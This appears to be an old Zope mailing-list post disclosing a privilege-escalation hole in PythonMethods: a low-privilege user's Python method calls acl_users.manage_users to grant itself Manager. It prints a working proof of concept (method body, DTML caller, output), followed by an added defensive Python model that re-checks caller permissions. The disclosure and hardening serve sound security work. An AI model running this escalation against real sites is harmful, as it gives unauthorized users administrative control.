python methods & zope - security hole ?
Evan -

I believe I have found a situation while using python methods that exposes a security hole. A user that can create python methods can grant the Manager role to himself by simply writing and then calling the manage_users method. This issue might also apply to other scenarios.

I created a simple test case to check the behavior ...

- create a user without any roles in an acl_users folder (see below)
- create a python method such as the one below that grants root access to the user (see below)
- create a dtml method that calls the python method .... this method should have view and access content information granted (see below) to the user created in the first step. In my case, I'm simply using the anonymous role ... but it could be another role set up for developers, content editors, etc.
- execute the dtml method (see below)

I also created a similar test case for dtml methods and the dtml method behaved as I expected .... preventing the user from obtaining the manage_users role because they do not have the role in the first place.

I just want to confirm if this is a known issue or a new issue (or feature or mistake in my zope setup). I'm currently running with zope 2.2.5 and python methods 0-1-7. If this is indeed an issue, it might be worthwhile to simply document this issue on the PythonMethods product page.

thanks,

- joe n.

###############################################################################
# Here is the output of this behavior ...
    UserName: dummy_non_manager
    Roles: ()
    Has 'View' ?: 0
    Has 'Manage users' ?: 0
    user 'dummy_non_manager' roles '['Manager']'
    user 'dummy_manager' roles '['Manager']'
    UserName: dummy_non_manager
    Roles: ('Manager',)
    Has 'View' ?: 1
    Has 'Manage users' ?: 1

###############################################################################
# Here is the python method

args: self,REQUEST

body:

    ret = ''
    users = {'dummy_manager' : ['Manager'],'dummy_non_manager' : ['Manager']}
    for u in users.keys():
        roles = users.get(u)
        REQUEST.set('name', u)
        REQUEST.set('roles', roles)
        self.acl_users.manage_users('Change',REQUEST)
        ret = ret + ('user \'%s\' roles \'%s\' <br>\n' % (u, roles))
    return ret

###############################################################################
# Here is the dtml method:

    <dtml-var standard_html_header>
    UserName: <dtml-var "REQUEST['AUTHENTICATED_USER'].getUserName()"><br>
    Roles: <dtml-var "REQUEST['AUTHENTICATED_USER'].getRoles()"><br>
    Has 'View' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br>
    Has 'Manage users' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('Manage users',REQUEST['AUTHENTICATED_USER'])"><br>
    <dtml-var "acl_users_roles_python_method(REQUEST)">
    UserName: <dtml-var "REQUEST['AUTHENTICATED_USER'].getUserName()"><br>
    Roles: <dtml-var "REQUEST['AUTHENTICATED_USER'].getRoles()"><br>
    Has 'View' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('View',REQUEST['AUTHENTICATED_USER'])"><br>
    Has 'Manage users' ?: <dtml-var "REQUEST['AUTHENTICATED_USER'].has_permission('Manage users',REQUEST['AUTHENTICATED_USER'])"><br>
    <dtml-var standard_html_footer>

--
Joseph Norton
norton@alum.mit.edu
+81-3-3822-6936
2-10-7 Tabata, Kita-ku, Tokyo 114-0014, Japan
(〒114-0014 東京都北区田端2丁目10-7)
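The test case above shows a trusted Python Method changing roles with the server's authority rather than the caller's: the user folder never asks who triggered the call. As an added example, not from Joseph's post or from Zope itself, here is a stand-alone Python model of that trust boundary with a hardened wrapper that re-checks the authenticated caller's 'Manage users' permission before delegating and records refused attempts for review; every class and function name here is a constructed stand-in, not Zope API.

```python
from dataclasses import dataclass, field

# Permission -> roles holding it (constructed, mirroring the two permissions
# queried by the post's DTML method).
PERMISSION_ROLES = {"View": {"Anonymous", "Manager"}, "Manage users": {"Manager"}}

@dataclass
class User:
    name: str
    roles: set = field(default_factory=set)

    def has_permission(self, permission):
        return bool(self.roles & PERMISSION_ROLES[permission])

@dataclass
class UserFolder:
    """Stand-in for acl_users: the role change itself never asks who called."""
    users: dict

    def manage_users_change(self, name, roles):
        self.users[name].roles = set(roles)

def guarded_change_roles(folder, caller, name, roles, log):
    """Hardened path: re-check the authenticated caller before delegating,
    since trusted code otherwise acts with the server's authority, not the
    caller's. Refused attempts are appended to `log` for later review."""
    if not caller.has_permission("Manage users"):
        log.append("REFUSED %r tried to set roles of %r to %r"
                   % (caller.name, name, sorted(roles)))
        return False
    folder.manage_users_change(name, roles)
    return True

def demo():
    folder = UserFolder({
        "dummy_non_manager": User("dummy_non_manager", {"Anonymous"}),
        "dummy_manager": User("dummy_manager", {"Manager"}),
    })
    low, admin, log = folder.users["dummy_non_manager"], folder.users["dummy_manager"], []
    return {
        "self_grant_refused": not guarded_change_roles(folder, low, low.name, ["Manager"], log),
        "still_not_manager": not low.has_permission("Manage users"),
        "manager_allowed": guarded_change_roles(folder, admin, low.name, ["Manager"], log),
        "now_manager": low.has_permission("Manage users"),
        "refusals_logged": len(log),
    }

if __name__ == "__main__":
    print(demo())
```

The same re-check belongs at the start of any trusted method that calls into the user folder, so the caller's roles, not the method author's, decide whether the change goes through.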